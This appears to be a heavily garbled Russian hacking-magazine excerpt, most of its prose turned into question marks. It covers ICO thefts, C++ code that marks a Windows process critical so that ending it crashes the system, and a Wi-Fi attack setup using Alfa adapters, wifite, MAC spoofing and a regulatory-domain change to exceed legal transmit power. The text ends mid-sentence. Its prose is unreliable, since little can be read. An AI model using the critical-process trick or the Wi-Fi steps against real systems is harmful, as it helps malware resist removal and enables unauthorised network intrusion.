???�???� ?????� ???�?� ????� ???�??� CoinDash.� ??� ???�?� ICO� ????� CoinDash
???� ????�??,� ??????� ???�?????� ??� ????�??� ????�???� ???�???� ??????�??�??
???????.� ?????�??� ????,� ???� ???� ???????�?� ????????� ??????�???� ?????�
??????�?� ??� ??� ??????�?� CoinDash,� ?� ??� ?????�???.� ???�??�?� ???�?� ???�?
????�?�???�????�??????�??,�??????��??????�????�??�?��0燛TH.
??�??�?�??�???�??�?????�??????�??��??�????�?�????�??????�??,
?????�????��???�??????.
??????
??�???�????�???�?�??�?�???�?,�??�?�?營CO�??????�??????????�?????�
????� ???�??.� ???�????� ?????�????�??� ?????,� ???� ???�???,� ???�????�???�?
???�??� DDoS????�??� ??� ????� ???�???.� ?????� ???�?� ???�?� ?????� ?????:
??????� ??????�?� ?????�????� ???�?,� ????�?� ???????� ?????� ?� ???�?????�?
?� ????????.� ??????� ??????�???� ?????� ???,� ???� ???� ?� ????�?.� ?� ???�??� ?� ICO
???�???�?�???�???�????:�??�??�??�??????�??�??�?�??�??�???�??�?
????�?????�?,� ???�??� ????�?� ???�??� ??????�???� ????�?????�?� ??� ?????
??????�?�??�????????�???�?.
???� ??????� ?????� ????�???� ??� ???�?� ?????�????� ???�??�??� ?????
??� ?????�?� ??� ???� ?????�?????�???� ???,� ???�?� ?� ????� ??????�?� ???????
???�??�??�?????�?,�??�???�?�??��?�????.�???�?燛therscan,�???�????�
??�???�?��??�?????�?????�?,�?????�??�???�?�??????�??�??.
??� ???�??�???� ???�????� Chainalysis,� ???�?� 56%� ????� ???????,� ????�??�??
?� ICO,� ????� ??????�?� ?� ???????� ?????�????� ????.� ???�??�??� ????�?
????�?�?�????�?��5�??�?????�??�????.�?�??�??燝roup?IB,�????�
???� ?????�????� ????�????�?� ??????�???�?� ??� 3� ?????� ??� 1� ???�????� ????�
?????� ?� ?????.� ???�??� ??????� ?� ?????� ???????�??� ???�??� ???????
???????� ?� ???????�??.� ?� ???�??� �???�??????�??� ???????�?粻 ???� ????�??�?
???�??�?�??�???�?????�?????�(?????�??�??�??�???�?��???�??�????�
???)��?�???�???�??�????�?�????�?????,�??�??�??�?????.
??�??�??� ???�?� ?� ???�???�????�?� ??????�?� ???�???�???� ???�???
?� ????�????� ????�??,� ????�???�???�?� ??????� ????�????� ?� ???�??�??�??
?� ??????� ???�???�?� ???�???�?� ???�???� ???�??� ??� ?????�????� ????.
?�????,�??�??????�??�?�???�???�?�?????�???�??????�???�??�????�
????????�??�?� ???�???,� ???�??�??� ???????�??� ?????�????� ???�??,� ???�???�
???�?�??�???�?.
??�?????��????�??�??�????,��??�??�????�??��???�??營CO燬TORM
Token�燝oogle.�?�??�???�????�??,�??�??�??�??�???�?��??�?????,
???�????�??� ?????� ???�???�???� ???�???.� ???�?� ????,� ???�?� ??????�???
?????�????燤yEtherWallet.�???�?�??�???�?!
????�????�??????�??�??� etherscamdb.info,�??�???�???�?�?????�?營CO.
?�??�???�??�?????�???�33�???�????.�????�???�?�??�????�??????
?????�???.�??�???�?�???�?燤yEtherWallet�??????�??�???�?�06�?????�
?????�??????.
?????�??????�????�????
??�??� ???�??� ????�??� ???� ?????� ICO??????�?� ?� ????????� ?????�??� ???�?
???????�?� ???�?.� ???� ???�???�?� ?????� ????�????�???� ????�????� ?� ?????�
??????�??,� ???�????�??� ?� ?????????�???�??� ?� ??????�?� ?� ???????�??
??????�??.� ?� ????� ????� ?????�???� ???�????�?� ?� ????�???�??� ??,� ????
??????�??????��?????�??�??�???�?????�?????�??�????�?�???�?.
??�????�??�??��??�??燭he燚AO,��?????�?�??�?????�???�?�??????
???� ???????� 53� ???�????� ???�????.� ???�??� ???�??� ?� ???�??� aeternity,
?� ??????�?� ??�?� ??????�?� 30� ???�?????� ???�????� ?????� ????????????�
???????��?????�?燩arity.
???�????�?� ?????????�???�??� ???????� ???�???�?� ????�??�???.� ????�
?????,��?????�??�??�?�??�??�?????�???�??�(PDF)�??�???�??�??�???�
????� ???�??�??�??.� ?????�??�?� ?� ?????�?� ????????� ???????�????� ?� ?� ????�
????,�??�???� Oyente� ???�???�?� ?????????�???�?� ??� ???�????�?� ?� ????�????�
???�??�?????.
???�??� ???�?,� �??�?????�??粻 ?????????�???�?� ???� ???�??� ????� ????�
????�??� ?� ????� ???????� ???�??????.� ???�????,� ?� ????�??� ??????� �???�?
????:�????�???�??�?????�?�??�?????�??�????????�???�??粻(PDF)�?????�
????�???�??�????��??�??�???�??�???�???�?�???�???�???,�??�??�?
??????�?????�????????�???�?�?�???.
???�???????�??????:�??????�???????
??�??� ???�????� ?????� ??????� ???�???� ?� ???� ???� ?????�?.� ???�??� ??????
???�?????�??� ????�????,� ??????�???� ???�??�?????� ????�???� ?????�???�??
????�??� ?????�??� ???�????� ?� ????,� ???� ????�???� ???�??�??�??� ?� ???�????
???�??�???�???�?� ?� ???�?????� ??????�?� ???�???????� ???�?????� ????�?
??�????�????�??�?�?????��??�???,�??�??�???�?????�????�?,�?????
???�??�?�??�??��??�????.�???�??�?�????�???�???�?�??�??�???�??
???�??�??�??�??�?�???�??????�??�?????�??.
????,� ???� ???� ???�?� ???�???,� ???�?� ???�???�??� ICO� ??� ????� ????�???
???�???�??.
1.�?�???� ??� DDoS????�?.� ????�????�?� ???�??� ???�??�??�??� ???�??� ?????�
????�???��??�???�??�?�???.�??�?�??????�??�?????�?�????�???�??
???????�?燚DoS.�????�???????�??�?�????�??�??????�???�????�?????�
???�??????�??�?�??�????.
2.�?�???�????�?�??�???.�??�??�?�????�?�??�??�???????�???�???�
??????�??� ????�???� ?� ????�??�??� ?????,� ???�?????� ????�?????�??� ??????�
??????�??,�???�???�?????�??�?????�?.
3.�?�????�???�??� ???????�????� ???�???�??.� ?????�???�?,� ???�?� ????�
??????� ???� ??� ???????� ???�????�??� ?� ???�???� ?????�???�??� ???�???�?
???�???��??�??�??�???�??�?�??�????.
4.�??�??�?� ?????????�???�??� ??� ???????� ?????�???� ???�????�??.� ???�?
???�??????�???�?????�???�?�???�???�??�???�????�??�?.
5.�??�???� ????�??�?� ???�????�???� ??????.� ???� ????�?????�?� ????�??
?�??????�???,�??????�??�????�????�???�?�??�???�???�????�?????�
???�??????�??�?�?????�??????.
??????
???�??�???�????� ?????� ??????�?� ?????� ????� ??� ????�???????�???� (???�?,
???????�?,� ??????�?,� ???�?),� ??� ????�?� ?� ??????,� ???� ????????� ???�?
????�??� ???�???� ?� ???�????�?� ?????� ????�????�????,� ??????�?????� ????�
???????� ????�??�?.� ?� ???�??� ?� Ethereum� ????�????�???� ????�???�???� ???� ?
???�????�???� ?� ????�???�??� ?????????�???�??,� ???� ?� ?� ??????� ???�??�???
????�?????� ???�?� ?????�??,� ???�??�???�??� ????�????� ?� ?????�?.� ??????�
???� ???????� ????� ??� ???�?� ?????� ???�??�????� ??????� ?????????�???�??
?�??�????�?????�???�??�?.�??�???�????��?????�???�????�??�?????
???????�?????�?�??�??????�???�?????�?��???�?????�??.
?????
?????????
???????
Nik燴erof
xtahi0nix@gmail.com
??????�????????
?�????????????�????????
?????????�???????�燱INDOWS
?????�??�??�??�??�???�????�??�???�??�???�?牜???�???�
????粻 ?� ????� ?????�???� ????� ??� ???,� Windows� ???????
?�????�????�???�?��??????�????�?.�???�??????�????�
????�?� ??????�???�???:� ????� ???�???� ????� ???�???� ???�???�
???,� ??� ???� ????�?� ?????� ?????�???� ????�?� ???.� ?� ????
??????� ?� ??????,� ???� ???�?????� ?????� ???�??�?� ?� ???� ????�
??????�?�??�??????�??�???.
??�?��??,�??�?????�???�???�???�?????�??�??�?�?�????�????,�??�?
????�???????� ??????�?� ???� ????�??� ???????� ????�??�??�???,� ????�????�?
?????�????.�???�??�??�?????�?,�?�?�??�????�??�?????�??�?�????.
???�????,�??�?�?????�?????�???�???�?????�???,�?��????�??�???�
????�????�??�????�?�??�???�?�??�??�???�???????燢ernel燩atch燩rotec?
tion.�???�???�??�?????��??�??�??�?�???,�??????�?�??�????.
??�??� ???�?????,� ???� ???�???� ???�??�??� ???�???� ?� Windows,� ???� ????�
??????,� ???� ???�???� ????�???� ???�??�??,� ?� ???� ???� ?????�???� ???� ???????
???�???�燘SOD.�???�?�?????,�??�?????�?�????�?�??�???,��??�???�
???� ?????.� ????� ???�???� ?� Windows� ?� ???� ??????� ???�?� ???�??�???
???�??????,��??????��????�???�?�??.
WARNING
????� ???,� ???????� ?� ???�???� ?� ??????,� ????�
???????�?� ???????�??� ?????????� ????�?� ?� ????�
?????�??� ??????,� ??????� ???� ?????�????� ????�
?????�???� ???�??�?� ???????� ????�??�?????
????��??????�??�???�燘SOD��????燙RITI?
CAL_PROCESS_DIED��??�?????�??????�???�
???.� ???� ???�?� ?� ???�????� ?� VirtualBox� ??� Win?
dows�燣TSB爔64��????�??�??�?.
????� ???�???�?� ???????,� ???????� ???????� ???� ???�???� ???�??�??� ???�???.
???� ???� ????�???� ??� ??????�????� ??????�?� NTAPI� (Native� Windows� API),
??????� �??�?????�?????�,� ???????� ???�?� ?????�???� ?� ??????� ?????�
??????�?.�??�??�???�?????�???�???� ntoskrnl.exe.�????�???�??� ntdll.
dll�?�??�??�???????�?�???�?��??�???�?.
RTLSETPROCESSISCRITICAL
???�??�??�???燦ative燗PI,�??????�??????�??�???????�??�???�??�???�
???�??,��??燫tlSetProcessIsCritical.�?�??�????�??�????�??:
NTSYSAPI
NTSTATUS
STDAPIVCALLTYPE
RtlSetProcessIsCritical(
   IN  BOOLEAN  NewValue,
   OUT PBOOLEAN OldValue OPTIONAL,
   IN  BOOLEAN  CheckFlag
);
???�?�??�??�???�??�???�?,�????�?�??????�??�?�????�???????�???�
????�??� SeDebugPrivilege.� ???� ???�?� ???�???� ?????� �???�??粻 ???�???
WinAPI.
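#include <windows.h>
#include <iostream>

// Enables the named privilege in the current process token.
// Returns TRUE on success and FALSE on failure.
BOOL setPrivileges(LPCTSTR szPrivName)
{
    TOKEN_PRIVILEGES tp = { 0 };
    HANDLE hToken = NULL;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        std::cout << "OpenProcessToken failed\n";
        return FALSE;
    }
    if (!LookupPrivilegeValue(NULL, szPrivName, &tp.Privileges[0].Luid))
    {
        std::cout << "LookupPrivilegeValue failed\n";
        CloseHandle(hToken);
        return FALSE;
    }
    // AdjustTokenPrivileges can return success without granting the
    // privilege, so GetLastError() is checked as well.
    BOOL ok = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)
              && GetLastError() == ERROR_SUCCESS;
    if (!ok)
        std::cout << "AdjustTokenPrivileges failed\n";
    CloseHandle(hToken);
    return ok;
}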
??�??�??�???�??�?????�??燬E_DEBUG_NAME�????�????:
setPrivileges(SE_DEBUG_NAME);
???�??� ???�??� ????????� ??� ?� ???� ?????�??� ???�???� RtlAdjustPrivilege:
???�?� ????????� ??� ?� ?????�??� ???�???� ???????�?� ???�????� 20� (SE_DEBUG_?
NAME).� ??????�???,� ?????� ???????� ????� ???�???� ??� ?????� ???�???� ????????
??爊tdll.dll�?????�??�?.�????�????�??�?????�????�???�??:
BOOLEAN bEn = FALSE; // receives the previous state of the privilege
RtlAdjustPrivilege(20, TRUE, FALSE, &bEn); // 20 = SeDebugPrivilege
????,�??�???�??�?????�?,�???�???�?��????�????�???????�??�??�?????�
???�?.
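#include <winternl.h> // NTSTATUS, PROCESSINFOCLASS
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

typedef NTSTATUS(NTAPI *pRtlSetProcessIsCritical)(BOOLEAN bNewValue, BOOLEAN *pbOldValue, BOOLEAN CheckFlag);
bool set_proc_critical()
{
    // Resolve the function from ntdll.dll at run time
    pRtlSetProcessIsCritical RtlSetProcessIsCritical = (pRtlSetProcessIsCritical)
        GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlSetProcessIsCritical");
    if (!RtlSetProcessIsCritical)
        return FALSE; // export not found
    if (NT_SUCCESS(RtlSetProcessIsCritical(TRUE, 0, FALSE)))
        return TRUE;
    else return FALSE;
}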
?????� ???� ?????�?:� ???�???� RtlSetProcessIsCritical� ??????�?� ???????�
???�??� ???�?????� ?????�??�?� GetProcAddress/LoadLibrary� ???�????
??爊tdll.dll.�????�???�??�??�????�?�???�??�??��??
if (NT_SUCCESS(RtlSetProcessIsCritical(TRUE, 0, FALSE))) return TRUE;
?????� ??� ??????�?� ???�????� TRUE,� ???�????� ???�???� RtlSetProcessIs?
Critical�??�???�??�???�??�??�??.�??????�??�?�?�??�???�?�??�???�
??????�?�??�????,���??�??�??�?�???�??�???�??�??�???� TRUE.�???
???�???� RtlSetProcessIsCritical� ?� ???????�??� FALSE,� ???�???� ??????�
?????�???�??�??�??.
??�??� ???�??� ???�???� ????�?� ?� ???�????�?,� ???� ????�?� ??????�?� ????�
????燫tlSetProcessIsCritical.�??�?????�?�??�???燦tSetInformation?
Process� ??� Native� API,� ???????� ????�???�?� ?� PEB� ???�??�?� ?� ????�?� ?� ???
????燭hreadBreakOnTermination��??��???�???�?�?,�??�?�??�???�???
???�???�??�??�???�??�??�??.
INFO
????� ????�????� ???�??�?� (Process� Environment
Block,� PEB)� ?????�???�?� ???�????�??� ???�????�
?????� ???�???,� ???????�?� ?� ????????� ?????�
?????�??�??�??�?��????�???�?????�???�??
??�?????爑sermode.�?�????�??�??�?�????�
???�????,� ????�?� ???�?� ??????� ???????�??
?�??????�?????,�?�???�????,��??�????�??
???????.� ????????� ?????�???� PEB� ???�?,� ?????�
???�???� ?� ???� ???�????� ??� ????�?� fs:[30h]
???爔86????�??�爂s:[60h]�??爔64.
??�??� ????�??,� ??� ??????�??� ??� ???�???� ??????,� ???????� ???�?????�???�
????�??�??�????�??�??�??�??�??�??.
NTSETINFORMATIONPROCESS
NtSetInformationProcess� ?� ???� ?????�??� ???�???,� ???????� ???????� ???
????�???� ???�????� ????� ThreadBreakOnTermination� ?� PEB� ??� ???�??� ???.
?????�???�??�???�???�?????�???????�?????�??�?�?爊tdll.dll,�??�?
???�?????�� RtlSetProcessIsCritical.� ????� ?????� ???�??�????,� ???�????�
??,� ??????�??� ???� ???�???,� ??� ????�?????�?� ???�????�????� ?� ?????� ????�
????�??�????燱indows:燫tlSetProcessIsCritical�????�???�???�?�燱in?
dows�
??�??�????�????�??�?????�??�?????�???�??.
typedef NTSTATUS(WINAPI *pNtSetInformationProcess)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG);
pNtSetInformationProcess NtSetInformationProcess = (pNtSetInformationProcess)
    GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationProcess");
bool set_proc_critical(HANDLE hProc)
{
    ULONG count = 1; // non-zero sets the flag
    if (NtSetInformationProcess &&
        NT_SUCCESS(NtSetInformationProcess(hProc,
            (PROCESSINFOCLASS)0x1D, // ThreadBreakOnTermination value from PROCESSINFOCLASS (ProcessBreakOnTermination in winternl.h)
            &count,
            sizeof(ULONG))))
        return TRUE;
    else return FALSE;
}
?� ???�???� NtSetInformationProcess� ??????�?� ?????� ???�??�?,� ???????
?????� ??????� ???�??�??,� ?� ???�?� 0x1D,� ???????� ????�???� ThreadBreakOn?
Termination��????�???燩ROCESSINFOCLASS.
????????�??????????�???????
??�???,� ???????,� ???� ???�???�????� ???�???� ????�???�?� ???�??� ?????� ????�
???�??,� ?� ????,� ?????� ????�?� ???�???� WinAPI� ?� NTAPI� ???� ???� ????� ???????�
????,� ??� ???�?� ???�??� ????�?????,� ????�???� ??� ?????� ???�???� ???�??�??
???�??.�??�???�?,�??�???�???�?�??�?�??�???�???�?????�?.
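typedef NTSTATUS(WINAPI *pNtQueryInformationProcess)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
BOOL check_critical(HANDLE hProc)
{
    // Resolve the function from ntdll.dll at run time
    pNtQueryInformationProcess NtQueryInformationProcess = (pNtQueryInformationProcess)
        GetProcAddress(LoadLibraryA("ntdll.dll"), "NtQueryInformationProcess");
    ULONG count = 0; // receives the current value of the flag
    if (NtQueryInformationProcess &&
        NT_SUCCESS(NtQueryInformationProcess(hProc,
            (PROCESSINFOCLASS)0x1D, // ThreadBreakOnTermination value from PROCESSINFOCLASS (ProcessBreakOnTermination in winternl.h)
            &count,
            sizeof(ULONG),
            NULL)) && count)
        return TRUE;
    else return FALSE;
}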
?????� ?� ???�???� NtQueryInformationProcess� ??????�???� ?????� ????�????�
???�?� ???� ???�??�?� ?� ????� ?� ?????�???� PROCESSINFOCLASS,� ???????� ???�?
???�?????.� ???�?� ?????�????� ???�???� NtQueryInformationProcess� ????�
????�?�??????�??燾ount,�??????�??�??�??�?�??�???,�???�??�???�???�
???�??.
???�?�??�???� NtQueryInformationProcess,�???�??�????�??�??�???,
????�????�??�??� ????�?� ???� ?????� ????,� ?� IsProcessCritical.� ??� ????�
?????�??�????�????�???�??.
BOOL IsProcessCritical(HANDLE hProcess, PBOOL Critical);
???�??�?????�??????�???�??�???:
BOOL test = FALSE; // receives the result
if (IsProcessCritical(GetCurrentProcess(), &test))
{
    if (test) std::cout << "Critical process\n";
    else std::cout << "NOT critical process\n";
}
???�???� IsProcessCritical� ????�??� ???????�??� test� ??� TRUE,� ????� ????�
????�??�??�??,�??�???�??燜ALSE��??�??�??,�???�??�?�??.
??????
?� ????� ??????� ?� ???�????�?� ???�??�???,� ???� ?????� ???�??�??� ???�??�?,
???�?�????�???�?�?�????�????.�??�?�?�???�?,�??�????�???�??�???�
?????� ?� ???�??�?,� ???�?� ???� ???�????�????� ?????�???,� ?� ???� ????�??�??
???�?????,� ????�???� ??� ???�???� ???�??�??.� ?� ????�??,� ???� ??� ??� ??????
???�?????� ???????�??� ???????�??� ?� ???�???�?????� ?????.� ??,� ???�?� ???
???�????�??�????�??!�?)
?????
????牜?????�
??????,
?�??�
?????!
?????????��??????????
????????�?????燱I?FI
84ckf1r3
84ckf1r3@gmail.com
?� ????�??� ?????�?� ?� ???�?????� ?????� ???�???� Wi?Fi� ??
?????�???� ???????� ???�???,� ?� ???�??� ???�??�?� ??� ?????
????�??????.�
???�???�??�
???�??�????�
????�????
?� ???????� ???�????� ??????� ???�??.� ???� ????�?????,� ????�
??�?????�?????�???�??�??�??�???�???�?,�??�???�????�
??� ?????�???� ???�??�??�??� ???�???,� ???�?????� ????�??
????��???�???�???�??�??�?燤AC?????�??.
WARNING
???� ???????�??� ???�??�????�?� ?????�?????�?
?�???�???�???�??�????.�?�????�??,�?�????
??� ?????� ??????�???�????� ??� ?????� ???�?????
????,�??�????�??�?????�??�?�??�??�?????.
???????????�???????燱I-FI-????????
????�??� ???�?� ??� ????????�????� ???�?� ???�??� ???�???� ???�???.� ????� ?????
???�??�???�??�????�?�???�??�???�??,�??�?�???�???�??�??�??�??�???�
??????� ?????� ???�???� ?� ?????�?????� ???� ??????� ???�???�?.� ???????�??�?
???� ?????� ???�??� ???????�??,� ???�?� ????�?????� ??� ?????�?� ????�??????�
???�??�?????�?燱PS??????�?�??�?????�???.
????�??�???�????�??�???�?
???�???�?�??�?????�?,�??�???�?�??�???�???�???��????�????燨f?
fensive� Security,� ????�???�???� ???????�??� ???�??�????� Kali� Linux.� ???�????�
????�?� ?� ???�???�??�?� ??� ????�???,� ???� ???�???� ????,� ????????� ?� ???� ???�?
???�???燱i?Fi�(?????�燗P,燼ccess爌oints)��???????�??�???�?�??�?��???�
??????�?�???�??�???�??�??�???�??.�?�???��????�???�????,��??????�
??�??????�???�??????�??�??/???.
??�???�??�???�??�?燯SB?????�???�?�????�???�?�??????�?���??
?????�??�??�??�????,��???�??�???�?�??�??????�??�???�???�??�???�
?????�?� ??????�???� ????�??� ??????.� ?????�?� ???�?� ???�???� Wi?Fi?????�??
??� ????�?� ?� ???�??????� ?????,� ??� ?� ?� ????�?????� ???�????�????� (?� ?� ????�
???���??????�???�???�???�?).
???�???�???�?�??�?�?????�???�?????�?燗lfa燦etwork.�???�??�?????�
???�??�??�?????�??????�??�???�???�???�???�???�?????�???�?????.
???�????,� AWUS051NH� v2� ?????� ????�???�????,� ??� ???�??� ???� ??� ???� ??
????燫T3572,��??�??�????�???�?.
???燫T3572
?????�???燗WUS051NH爒2
?�???牜???�???�??粻???燫T3572��???�?�??�????�??�????�???�(????��???�
???� ????�????� ??� Alfa� Network� ???� ???� ???�?).� ??� ???� ??????� ???�???�????
?�???�??�?�?�??�??��????�??�???��???�??�??�???��??��???.
????燗WUS051
????�??��?????�?????�??�???�???�???�燦etis燱F2150.�??�????�??�???�
??��??�?,�?�?�??�?????�??�???�????.
????燱F2150
???�?�燗P,��??�???�??�???�?�???�???�??�?�??�???�???��??.�???�
?????� ??� �??�???�??粻 ???� RT5572N,� ??????�???� ???�???�???� ???�??�???
?????�??�????�??�??�?�?????�???�???.�??�??�????�????,�??�?�??
?????�???��??�??�???�???�??�??????��???�???�???�???�?�?�??�?.
????�?� ????�???�??� ???�????� (??)� ????�??� ???????� ?� ????� ???�?� ?� ????
???�??,�??�???�?�???�?��????�??�??�????�??�??��??�???�????.
????�?� ???� ??????� ???????,� ????�?� ???�????� ??� ????�????� ???�??????�
?????� ?� ????�??�????�????� ?� ???�????� ???�?????�???� ???????�?.� ?????
?????� �??粻 ????�?� ???�?????�?,� ?� ???� ??????�??� ???????� ???�?????� ?????
????�?�?�???�???.�??�????�???�??????�??�??�??�????��????�????.
??� ???�????�?� ???�????�??� ???� ???�?????�??�???� ??????�??� ???�??�?
?�????�??�??�?,�??�???�?�?�??�??????�??????�????�??????.
INFO
??�????� ?� ?????� ???????� ??� ?????� ????� ???????�
????�???,�??�???�??�??�?�?�??.�????�?
????�?�?�??�??????,�??�?????�??�??????�?
??????��??�???�???�????,��?�????�?�????�
??????�?????�?��??��???�?�????�??�?�???�
??????.� ????�?� ??????�??� ????� ?� ???�??�???
??????� ??????�??�?� ?� ???�???�?� ?� ???????
????�??�???�?????�??�????�??�?????�????�????�
???� ???�???�?,� ?????�????� ???� ????�??????
???????�??�??�??�??�??�????�?????�??�???�
?????.
???�????�??????�???
??�???� ?� ??????� ?� ????�??�???�??� ???�???�??� ?????�????� ???????�?,
????�?� ????�???� ????� ???�???�??� ???�?� ??� ????� ???.� ????�??????� ???�?
??�??�??�??�??�???�?????�?�?????��???�???�?�??,�??�?�??�???�??
???????.�??�????,�??�???�??�?????�???�?????�??,�????�??�?????�??
???�???� ???�?????� ???�?� ???�???� ?????�???� ???�???�??� ?????�???.� ????� ??
????�?� ???�???� ?????�??� AP,� ???�????� ??� ?� ???�?� ???�?� �???� ???�??�,
?� ???�????� ??????�??� ??????� ??� ?????�????� ???�??�???� ??????�??.� ???
???�??�???�??�???�??????�???,�?�??�??�?????
????�??�???�???:�??�?�???�??�???�??�??�???�??�?????�??�????
???�??�???.� ?� ???�??� ???�??� ?????� ????� ????�???� ?� ?????�??,� ???�??�?
?????� ??????.� ??????�???� ?� ???�?????� ????� 100� ???� ???�?� ?????�???�?
??�????�?.�???�????�????�?�??�???�??�??,�????�?�??�???�??�??�??
????�??.
WARNING
??�????� ??� ???????� ???�????,� ????�??� ???�??
?????�???�???� (???�??�?� ?� ??????� ???????
???????),�?????�?�?????�??�?��???�???�???
??????�??� ????�????� ???� ???�????.� ?????�?
??� ?????� ???�?� 33� dBm.� ???�????� ??????
?���???�?�??�???�???�??�????.�??�?�????
???????�????�??,�
?????�?�
???�??�?
??� ?????????�?� dBm� ????� ????�?????� ??????�??
???�????.
??�???�????�??燱i?Fi???????�???�???�?�???????�??�??�????.��????
??????� ???� ?????�???�?� ???�????� ????�????� ISO� 3166,� ???????� ????�??
?� ????� ???�??� ???�??�??�??� ??????�??.� ?� Linux� ???� wireless� regulatory� data?
base.� ?� Kali� Linux� (????�??� Nethunter)� ???� ???????�?� ??� ????�?� /lib/crda/
regulatory.bin.� ????� ????� ???�???�?� ?????� ???�????�??� ????� ???�??� ????�
?????�??????�??� ???�??�?� (Central� Regulatory� Domain� Agent� ?� CRDA)
?� ??????�???� ????� ???????�??� ?� ???,� ?????� ???�????� ?????�???
???� ???????�???� ?� ???�??� ????�??.� ?????� ????�??,� ?� ??� ???�???�?� ?????
???�?????� ???�???�?� ???�????� ???????�???� ???� ?????� Wi?Fi?????�????
??�??�???�??�??�??�??�??�???????�?.
??�???�????�???�?�????�???????????�??�?�???�??燛MEA,�??�???�
????�???�???�?�??�??�0�??�(20�??).�????�?,�??�??�??�????�????,
??� ??????� ????�?� ?????� ??????� deauth� ?� ??????�?� ???�?????� ???�??�??� AP.
????� ???� ????�??� ????� 20� ???,� ?� ????�??� ????� ??????� ??????�??�???
??????�?�?????�???�?�??�?????.
???�??????� ???????� ????�?,� ???�?????� ??????� ?� ???�????�??� ???�???
???�????� ???�?� ?????�??� iw� list,� ????�?� ??� ??????� ??????�???� ?????
????�??�(??�??�???�?�???�??).
????�??�??????�?�??�??�??�??�?????�??
???�??� ???�?????� MAC??????� ?� ?????�??� ???�????� ???????�???� ????�??
?????�??爄w�???_??????????>爄nfo.
???�????????�??�?�??�??�?
??� ???�???� BackTrack� ???�?� ????� ????�?� ?????� ????�??� ??????�????� (????�
?????,�?燗lfa燦etwork)��??�?�???????�??�??�?�??�????.�???��??,�??
?� ???� ????�???�?� ???� ???�??� ?????� ????�????�??� ???,� ???????� ???�???�?
??????�?????�???�??�??�????.�??�????,�??牜BO粻?�??????.�??�????
???� ????� ???�?????� ???�????� ???????�????� IEEE� 802.11b/g/n� ??� 2000� ???
(33�??).�??��???�???�??�???�?�??�????�?�???�????��??�??.�???�
???��??????�??�???�?�???�???�??���??�(1000�??),�?�??�??�??�?
??�??????�??�?�????�???�??�??�?.
??�??�?� ????�????�??� ???�???�?� ????�???????,� ?� ????� ?� ??� ??� ??????
????�?????�?????????�??�??????.�????�?�??�??�????�?牜???�?粻?????�
????????��??????.�??�?�??�???�?�?�??�??�?????�??????�??�???�?
???�??�??�????.�??�?????�???�????:�???�???�??�??�???�???�?,�???�
???�???� �??�?粻 ???� ???�??� ???�????�??� ????�??,� ??????� ?????� ???????
???�????�??????�???��??�??????�?�?????.�??�???�???�?,��???�????�
???�??�??�???�??�??�??�????�??�???�???�???�?.��??�????�?�??�????
????�??�??:燢ali,燘ugTraq營I,燘ackbox,燙yborg�燤atriux.�??�?�????�?�??�?
????�??��??�???�??�??�????�??�???�?�??�???�?��???�????.
??�?????� ???�??�????� ????� ????�?� ?� Backbox.� ???�????� ???�??�??�???
????????�?� ?� ???� ???�????� ???� wlxmac,� ???� ????�?� mac� ?� ?????� ????�???,
???????�??� ?� ???�??� ?????�??.� ???�???� macchanger� ????�???�???� ???�???�
???,�???�?�??�????�???????�?�???�???�???�??.�??�???�?????��???�
??????�????�?�??�???�????�(??.�????�?�??�??).
???�??�??�????爓lan�燘ackbox
??�??� ????�??� ???�?????� ???�???�??� ???�????� ???????�???� ????�??,
??�??�??�?�?????.�????�?�??�????�??�?????�?�?�??�???燢ali�18.1.
INFO
????�????�?�??�????�?�????�???�?�?�??�?
?????�???�?????�?.� ?????�?� ???�????� ???� ?????
???�?????�??爏udo��?????�??�??�???�?.
???�???� ??� ????�???�?� ???�?� ???�??�??�??� ????????�??� ?????�??� iw?
config.�????,��??�???,爓lan0�爓lan1��??�?????,�????�?�??�??�???
???�?�??�??�????�??�??�??�???�????�??�??�????,�???��??�??��???�
????��????�??????�??.
???�??�??�??:�??????�?�????�???燯SB??????��????�????�?� iw?
config�?????.�??�????????,�?????�?�?????�??��???�?,��??�??�??.
??�?????�?�??�??�??�??�???????�?
???�??� ???�??:� ??????�?� wifite.� ??� ????� ?� ???�???�?� ???�????�??
?????�??,� ????� ???�?� ????�???�?,� ?????� ?????????� ??????�?????,� ?� ?????�
????�?�?�??�????�???�?���??�???�?�??�???��????�???�??�??�????�
?????.� ????� ?� ???�????� wlan� ????� ?????�???� ???�??� ?� ????�????� USB� ?� ??
?�????.
????�??�????爓lan�爓i?te
???�?� ????� ???� ????�???�???� ?� ???�???�?� ???�??�??�???� ????????�?,
?????�???�??.
ifconfig wlan1 down
??�???�??�?�???????�?�??�???燤AC??????�???�???.
macchanger -r wlan1
????� ?r� ????�?� ???�??�??� ?????,� ?� ????� ??????� ???�???� ????�????�??,
??????�??�???�?mac.�??�????:
macchanger --mac=2F:4B:D9:33:89:0B wlan1
??�???�??,�??�??�??�??�??�?�??�???�?�??�???�???�?.�?�??�??�(OUI
vendor爈ist)�???�?� ?????� ???� ?????.� ??� ???�????�?,� ????� ??� ??????� ???????�
??????�??�??�????�?�?????�???�??�???�??�???�??�?�???�??�???????
???�?�??�?????�??�??�??燤AC?????�??.��???�?�??�??燗P�????�?�???�
????�?� ?� OUI� ?� ????�?� ????�???�?� ?� ???�??�????� ???�????� ?� MAC?????�??
????�??�??�?�??�???�???�?.
??�???� ????�?� ???�????� ????�??,� ?� ???????� ???�?????� ???????�???
???�?????��??�??�???.
iw reg set BO
??�???� BO,�??�?????�??�??�????�??�?�??????�?????�???�?�???�??
AM,� BZ,� GR,� GY,� NZ,� VE� ?� ???�??� (???�??� ???�??� ????�?� ?� ???�?� db.txt,
????�?� ??� ????� ????� ??� ????�?� ?????� ??� ???�??).� ????�????�?� ???�???�?
?????�???�??�?�???�??:
iw reg get
??�??� ????�?� ???�?????� ???�???�?� ?????�????� ???�????� ???� ???�????�?
???�??�??�???�???????�?:
iwconfig wlan1 txpower �
???�???�?�??:
ifconfig wlan1 up
?�??�???�?�?????�??:
iwconfig
???�??�???????�?�??�??�?�??,�??�?�????�???�???.
??�?� ??� ???�???,� ??� ???�?????�?� ???�???� ?????�?� ???� ???.� ???�?� ????,� ???
